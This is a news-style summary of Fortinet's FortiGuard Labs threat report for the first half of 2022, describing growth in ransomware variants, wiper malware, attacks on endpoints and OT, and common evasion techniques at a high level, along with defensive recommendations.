The most recent FortiGuard Labs Global Threat Landscape by Fortinet (NASDAQ: FTNT), a leading supplier of comprehensive, integrated, and automated cybersecurity solutions, has revealed the following. FortiGuard Labs has encountered a total of 10,666 ransomware variations in the last six months, as opposed to just 5,400 in the preceding six months. In just six months, ransomware strains have increased by over 100 percent.
Due to the ubiquity of Ransomware-as-a-Service (RaaS) on the dark web, criminals would continue to profit from it, prompting businesses to think about ransomware settlements. Regardless of their size or sector, firms might need a proactive strategy to combat ransomware. Zero-trust network access (ZTNA), sophisticated endpoint detection and response (EDR), and real-time visibility, protection, and repair can be essential in preventing ransomware attacks.
To sum up, highlights of the latest FortiGuard Labs Global Threat Landscape report include:
- With additional variants made possible by Ransomware-as-a-Service (RaaS), the ransomware menace keeps evolving.
- Cyber attackers continue to target work-from-anywhere (WFA) endpoints in order to penetrate business networks. Given the expanding attack surface and the convergence of operational technology (OT) and information technology (IT), cyber attackers are drawn to both OT and IT settings as appealing targets.
- The proliferation of wiper malware as a component of adversary toolkits would be proof that destructive threat trends are still evolving.
- In order to boost accuracy and destructive weaponization along the cyber-attack chain, cyber adversaries are using additional reconnaissance and defense evasion measures.
“Cyber adversaries are advancing their playbooks to thwart defense and scale their criminal affiliate networks,” said Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs. “They are using aggressive execution strategies such as extortion or wiping data as well as focusing on reconnaissance tactics pre-attack to ensure better return on threat investment. To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.”
OT and Endpoint Still Irresistible Targets
Cyber adversaries continue to devote substantial resources to developing new attack methodologies as ransomware remains a major concern. FortiGuard Labs has encountered a total of 10,666 ransomware variations in the last six months, as opposed to just 5,400 in the preceding six months. In just six months, ransomware strains have increased by over 100%. Due to the ubiquity of RaaS on the dark web, criminals continue to profit from it, prompting businesses to think about ransomware settlements. Regardless of their size or sector, firms need a proactive strategy to combat ransomware. Zero-trust network access (ZTNA), sophisticated endpoint detection and response (EDR), and real-time visibility, protection, and repair are essential.
As attackers continue to target the expanding attack surface, the digital convergence of IT and OT and the endpoints supporting WFA continue to be important attack vectors. Unauthorized individuals often acquire access to a system as part of endpoint vulnerability exploits with the intention of moving laterally into corporate networks. For instance, a remote code execution (RCE) vulnerability (CVE 2022-26937) and a high-volume spoofing vulnerability (CVE 2022-26925). The persistent route taken by cyber attackers in their attempts to acquire access by utilizing both old and new vulnerabilities is also revealed by examining endpoint vulnerabilities by volume and detections.
Additionally, the industry wasn’t exempt when examining trends in OT susceptibility Numerous devices and platforms were subjected to in-the-wild attacks, illuminating the reality of greater IT and OT convergence in terms of cybersecurity as well as the disruptive objectives of attackers. At an early stage of an attack, advanced endpoint technologies may assist minimize and successfully repair affected devices. In addition, services like a digital risk protection service (DRPS) may be utilized to do evaluations of external surface hazards, detect and fix security flaws, and aid with contextual insights on present and impending dangers.
Wipers Widening
Trends in wiper malware show a troubling progression of more harmful and sophisticated attack methods, continuing with malicious software that erases data. The conflict in Ukraine encouraged threat actors to target vital infrastructure more often with disk wiping malware, which has since grown significantly.
In the first half of 2022, FortiGuard Labs discovered at least seven significant new wiper variants that were being deployed in several campaigns against governmental, military, and commercial institutions. The fact that this figure is so close to the total number of wiper variations that have been discovered since 2012 makes it relevant. In addition, the wipers did not remain in a single region; instead, they were found in 24 nations, except Ukraine. Network detection and response (NDR) with self-learning artificial intelligence (AI) is used to better identify intrusions in order to lessen the effect of wiper assaults. Additionally, backups must be kept offline and off-site.
Findings concerning the development of ransomware attack plans and tactics may be drawn from examining adversarial strategies. In order to identify the most common strategies throughout the last six months, FortiGuard Labs examined the functionality of malware that was discovered. Defense evasion was the strategy that malware writers utilized the most frequently out of the top eight endpoint-focused strategies and approaches. They frequently achieve this by executing system binary proxies.
For opponents, concealing malevolent intentions is one of the most crucial things. As a result, they are seeking to conceal commands using a valid certificate to execute a trusted process and carry out nefarious purpose while concealing protections. Process injection, the second most widely used approach, is thieves inserting code into another process’s address space in an effort to bypass security measures and increase stealth. Organizations will be in a better position to protect themselves against the extensive toolkits that attackers equipped with this useful intelligence. Protecting the edges of hybrid networks requires integrated, AI and ML-driven cybersecurity solutions with superior detection and response capabilities supported by actionable threat intelligence.
AI-powered Security
Organizations may better coordinate their defenses to adapt and respond proactively to rapidly changing attack approaches when they have a better grasp of the objectives and strategies employed by their adversaries thanks to actionable threat information. To help prioritize patching efforts and create more secure settings, threat insights are essential.
To keep staff members and security teams informed as the threat landscape develops, cybersecurity awareness and training are also crucial. To stay up with the quantity, level of sophistication, and speed of today’s cyber threats, organizations require security operations that can run at machine speed. Based on a cybersecurity mesh architecture, AI and ML-powered prevention, detection, and response tactics allow for much closer integration, improved automation, as well as a more quick, coordinated, and efficient response to attacks throughout the extended network.
Report Overview
This most recent Global Threat Landscape Report is a snapshot of FortiGuard Labs’ collective intelligence, taken from Fortinet’s extensive sensor network, which collected billions of threat events detected globally during the first half of 2022.
The FortiGuard Labs Global Threat Landscape Report uses this model to describe how threat actors target vulnerabilities, build malicious infrastructure, and exploit their targets, much like how the MITRE ATT&CK framework classifies adversary tactics and techniques, with the first three groupings spanning reconnaissance, resource development, and initial access. The paper also discusses threat trends affecting IT and OT from a global and regional viewpoint.
